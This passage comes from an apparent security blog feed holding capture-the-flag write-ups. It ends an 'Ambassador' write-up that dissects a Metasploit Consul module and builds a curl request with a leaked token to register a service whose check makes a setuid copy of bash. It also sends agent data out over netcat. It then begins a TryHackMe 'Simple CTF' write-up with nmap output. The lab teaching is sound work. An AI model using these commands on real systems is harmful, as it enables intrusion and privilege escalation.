&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>I don&amp;rsquo;t want to use metasploit to exploit this. So let&amp;rsquo;s disect the exploit script.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-ruby" data-lang="ruby">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">check&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> res &lt;span style="color:#fe8019">=&lt;/span> send_request_cgi({
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;method&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;GET&amp;#39;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;uri&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> normalize_uri(target_uri&lt;span style="color:#fe8019">.&lt;/span>path, &lt;span style="color:#b8bb26">&amp;#39;/v1/agent/self&amp;#39;&lt;/span>),
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;headers&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;X-Consul-Token&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> datastore&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;ACL_TOKEN&amp;#39;&lt;/span>&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> })
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>There&amp;rsquo;s a &lt;code>check&lt;/code> function which checks whether the service is vulnerable or not. It uses the consul token we found from &lt;code>git log&lt;/code> inside &lt;code>X-Consul-Token&lt;/code> header to access &lt;code>/v1/agent/self&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app$ curl http://127.0.0.1:8500/v1/agent/self -H &lt;span style="color:#b8bb26">&amp;#39;X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We get a mess ( &lt;code>json&lt;/code> data ) as output so we have to save that to a file. I can show a cool trick to save the file on the remote host:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Run this in the box&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app$ &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#fe8019">$(&lt;/span>curl http://127.0.0.1:8500/v1/agent/self -H &lt;span style="color:#b8bb26">&amp;#39;X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5&amp;#39;&lt;/span> --silent &lt;span style="color:#fe8019">)&lt;/span> | nc -lnvp &lt;span style="color:#d3869b">1234&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Run this in your machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> nc 10.10.11.183 &lt;span style="color:#d3869b">1234&lt;/span> &amp;gt; v1.agent.self.json
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Or you can just copy paste the output instead&amp;hellip;&lt;/p>
&lt;p>The metasploit script then parses this &lt;code>json&lt;/code> data and does some checks to find out whether it is vulnerable or not:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-ruby" data-lang="ruby">&lt;span style="display:flex;">&lt;span>agent_info &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#d3869b">JSON&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>parse(res&lt;span style="color:#fe8019">.&lt;/span>body)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> agent_info&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;Config&amp;#34;&lt;/span>&lt;span style="color:#fe8019">][&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;EnableScriptChecks&amp;#34;&lt;/span>&lt;span style="color:#fe8019">]&lt;/span> &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#fe8019">true&lt;/span> &lt;span style="color:#fe8019">||&lt;/span> agent_info&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;DebugConfig&amp;#34;&lt;/span>&lt;span style="color:#fe8019">][&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;EnableScriptChecks&amp;#34;&lt;/span>&lt;span style="color:#fe8019">]&lt;/span> &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#fe8019">true&lt;/span> &lt;span style="color:#fe8019">||&lt;/span> agent_info&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;DebugConfig&amp;#34;&lt;/span>&lt;span style="color:#fe8019">][&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;EnableRemoteScriptChecks&amp;#34;&lt;/span>&lt;span style="color:#fe8019">]&lt;/span> &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#fe8019">true&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> &lt;span style="color:#d3869b">CheckCode&lt;/span>&lt;span style="color:#fe8019">::&lt;/span>&lt;span style="color:#d3869b">Vulnerable&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We can use &lt;code>jq&lt;/code> to check these conditions rather than searching manually through the whole file:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span> cat v1.agent.self.json | jq &lt;span style="color:#b8bb26">&amp;#34;.Config.EnableScriptChecks&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>null
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> cat v1.agent.self.json | jq &lt;span style="color:#b8bb26">&amp;#34;.DebugConfig.EnableScriptChecks&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>null
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> cat v1.agent.self.json | jq &lt;span style="color:#b8bb26">&amp;#34;.DebugConfig.EnableRemoteScriptChecks&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">true&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>And we can see that &lt;code>EnableRemoteScriptChecks&lt;/code> is &lt;code>true&lt;/code> and hence it is vulnerable.&lt;/p>
&lt;p>The &lt;code>exploit_command&lt;/code> function sends a &lt;code>PUT&lt;/code> request to &lt;a href="https://developer.hashicorp.com/consul/api-docs/agent/service#register-service">&lt;code>v1/agent/service/register&lt;/code>&lt;/a> with the consul token and a &lt;code>json&lt;/code> data. Inside the json data there&amp;rsquo;s a payload. We can add our reverse shell there.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-ruby" data-lang="ruby">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">execute_command&lt;/span>(cmd, opts &lt;span style="color:#fe8019">=&lt;/span> {})
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> uri &lt;span style="color:#fe8019">=&lt;/span> target_uri&lt;span style="color:#fe8019">.&lt;/span>path
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> service_name &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#d3869b">Rex&lt;/span>&lt;span style="color:#fe8019">::&lt;/span>&lt;span style="color:#d3869b">Text&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>rand_text_alpha(&lt;span style="color:#d3869b">5&lt;/span>&lt;span style="color:#fe8019">..&lt;/span>&lt;span style="color:#d3869b">10&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> print_status(&lt;span style="color:#b8bb26">&amp;#34;Creating service &amp;#39;&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>service_name&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> res &lt;span style="color:#fe8019">=&lt;/span> send_request_cgi({
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;method&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;PUT&amp;#39;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;uri&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> normalize_uri(uri, &lt;span style="color:#b8bb26">&amp;#39;v1/agent/service/register&amp;#39;&lt;/span>),
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;headers&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;X-Consul-Token&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> datastore&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;ACL_TOKEN&amp;#39;&lt;/span>&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> },
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;ctype&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;application/json&amp;#39;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;data&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:ID&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>service_name&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:Name&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>service_name&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:Address&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;127.0.0.1&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:Port&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#d3869b">80&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:check&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:script&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>cmd&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:Args&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;sh&amp;#34;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#34;-c&amp;#34;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>cmd&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#fe8019">]&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:interval&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;10s&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#83a598">:Timeout&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;86400s&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }&lt;span style="color:#fe8019">.&lt;/span>to_json
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> })
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once the service is created and check script is executed it sends another request to &lt;code>v1/agent/service/deregister/#service_name&lt;/code> to remove the service.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-ruby" data-lang="ruby">&lt;span style="display:flex;">&lt;span> print_status(&lt;span style="color:#b8bb26">&amp;#34;Service &amp;#39;&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>service_name&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#39; successfully created.&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> print_status(&lt;span style="color:#b8bb26">&amp;#34;Waiting for service &amp;#39;&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>service_name&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#39; script to trigger&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">sleep&lt;/span>(&lt;span style="color:#d3869b">12&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> print_status(&lt;span style="color:#b8bb26">&amp;#34;Removing service &amp;#39;&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>service_name&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> res &lt;span style="color:#fe8019">=&lt;/span> send_request_cgi({
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;method&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;PUT&amp;#39;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;uri&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> normalize_uri(
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> uri,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;v1/agent/service/deregister/&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>service_name&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ),
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;headers&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;X-Consul-Token&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> datastore&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;ACL_TOKEN&amp;#39;&lt;/span>&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> })
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>From this information we can craft a &lt;code>curl&lt;/code> request to execute our payload:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>curl -XPUT http://127.0.0.1:8500/v1/agent/service/register -H &lt;span style="color:#b8bb26">&amp;#39;X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span> --data &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;ID&amp;#34;: &amp;#34;h4r1337&amp;#34;, &amp;#34;name&amp;#34;: &amp;#34;h4r1337&amp;#34;, &amp;#34;Address&amp;#34;: &amp;#34;127.0.0.1&amp;#34;, &amp;#34;Port&amp;#34;: 80, &amp;#34;check&amp;#34;: {&amp;#34;Args&amp;#34;: [&amp;#34;sh&amp;#34;, &amp;#34;-c&amp;#34;, &amp;#34;cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash&amp;#34;], &amp;#34;interval&amp;#34;: &amp;#34;10s&amp;#34;, &amp;#34;Timeout&amp;#34;: &amp;#34;86400s&amp;#34;}}&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br>
&lt;img src="https://h4r1337.github.io/img/ambassador/Pasted%20image%2020230131205827.webp" alt=""></content></item><item><title>Simple CTF | TryHackMe</title><link>https://h4r1337.github.io/posts/simple-ctf/</link><pubDate>Sat, 14 Jan 2023 22:55:43 +0530</pubDate><guid>https://h4r1337.github.io/posts/simple-ctf/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://tryhackme-images.s3.amazonaws.com/room-icons/f28ade2b51eb7aeeac91002d41f29c47.png" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://tryhackme.com/rooms/easyctf">Simple CTF&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Description&lt;/td>
&lt;td style="text-align: center">Beginner level ctf&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;img src="https://tryhackme-badges.s3.amazonaws.com/MrSeth6797.png" alt="MrSeth6797">&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;p>In this easy box we will exploit an unauthenticated blind SQL injection on a vulnerable instance of &lt;code>CMS Made Simple&lt;/code> and gain credentials of an SSH user. From there we will read the root flag by privilege escalation using vim.&lt;/p>
&lt;h4 id="used-tools">Used tools&lt;/h4>
&lt;ul>
&lt;li>nmap&lt;/li>
&lt;li>dirsearch&lt;/li>
&lt;li>searchsploit&lt;/li>
&lt;li>&lt;a href="https://www.exploit-db.com/exploits/46635">CVE-2019-9053&lt;/a>&lt;/li>
&lt;/ul>
&lt;h4 id="wordlists">Wordlists&lt;/h4>
&lt;ul>
&lt;li>&lt;a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt">common.txt&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz">Rockyou.txt&lt;/a>&lt;/li>
&lt;/ul>
&lt;hr>
&lt;h1 id="enumeration">Enumeration&lt;/h1>
&lt;p>First start with quick nmap port scan&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://tryhackme-images.s3.amazonaws.com/room-icons/f28ade2b51eb7aeeac91002d41f29c47.png" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://tryhackme.com/rooms/easyctf">Simple CTF&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Description&lt;/td>
&lt;td style="text-align: center">Beginner level ctf&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;img src="https://tryhackme-badges.s3.amazonaws.com/MrSeth6797.png" alt="MrSeth6797">&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;p>In this easy box we will exploit an unauthenticated blind SQL injection on a vulnerable instance of &lt;code>CMS Made Simple&lt;/code> and gain credentials of an SSH user. From there we will read the root flag by privilege escalation using vim.&lt;/p>
&lt;h4 id="used-tools">Used tools&lt;/h4>
&lt;ul>
&lt;li>nmap&lt;/li>
&lt;li>dirsearch&lt;/li>
&lt;li>searchsploit&lt;/li>
&lt;li>&lt;a href="https://www.exploit-db.com/exploits/46635">CVE-2019-9053&lt;/a>&lt;/li>
&lt;/ul>
&lt;h4 id="wordlists">Wordlists&lt;/h4>
&lt;ul>
&lt;li>&lt;a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt">common.txt&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz">Rockyou.txt&lt;/a>&lt;/li>
&lt;/ul>
&lt;hr>
&lt;h1 id="enumeration">Enumeration&lt;/h1>
&lt;p>First start with quick nmap port scan&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -p- -T4 --min-rate &lt;span style="color:#d3869b">10000&lt;/span> 10.10.38.40 -vv -oA nmap/ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Starting Nmap 7.80 &lt;span style="color:#fe8019">(&lt;/span> https://nmap.org &lt;span style="color:#fe8019">)&lt;/span> at 2023-01-14 10:25 IST
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.38.40
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.47s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">65532&lt;/span> filtered ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>21/tcp open ftp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>2222/tcp open EtherNetIP-1
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap &lt;span style="color:#fe8019">done&lt;/span>: &lt;span style="color:#d3869b">1&lt;/span> IP address &lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#d3869b">1&lt;/span> host up&lt;span style="color:#fe8019">)&lt;/span> scanned in 213.02 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now further scan only the open ports identified from above.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -p 21,80,2222 -sC -sV 10.10.38.40 -vv -oA nmap/service
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Nmap 7.80 scan initiated Sat Jan 14 10:29:32 2023 as: nmap -p 21,80,2222 -sC -sV -vv -oA nmap/service 10.10.38.40&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.38.40
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received syn-ack &lt;span style="color:#fe8019">(&lt;/span>0.55s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2023-01-14 10:29:33 IST &lt;span style="color:#fe8019">for&lt;/span> 42s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>21/tcp open ftp syn-ack vsftpd 3.0.3
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| ftp-anon: Anonymous FTP login allowed &lt;span style="color:#fe8019">(&lt;/span>FTP code 230&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_Cant get directory listing: TIMEOUT
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| ftp-syst:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| STAT:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| FTP server status:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Logged in as ftp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| TYPE: ASCII
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| No session bandwidth limit
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Session timeout in seconds is &lt;span style="color:#d3869b">300&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Control connection is plain text
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Data connections will be plain text
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| At session startup, client count was &lt;span style="color:#d3869b">3&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| vsFTPd 3.0.3 - secure, fast, stable
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_End of status
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack Apache httpd 2.4.18 &lt;span style="color:#fe8019">((&lt;/span>Ubuntu&lt;span style="color:#fe8019">))&lt;/span>
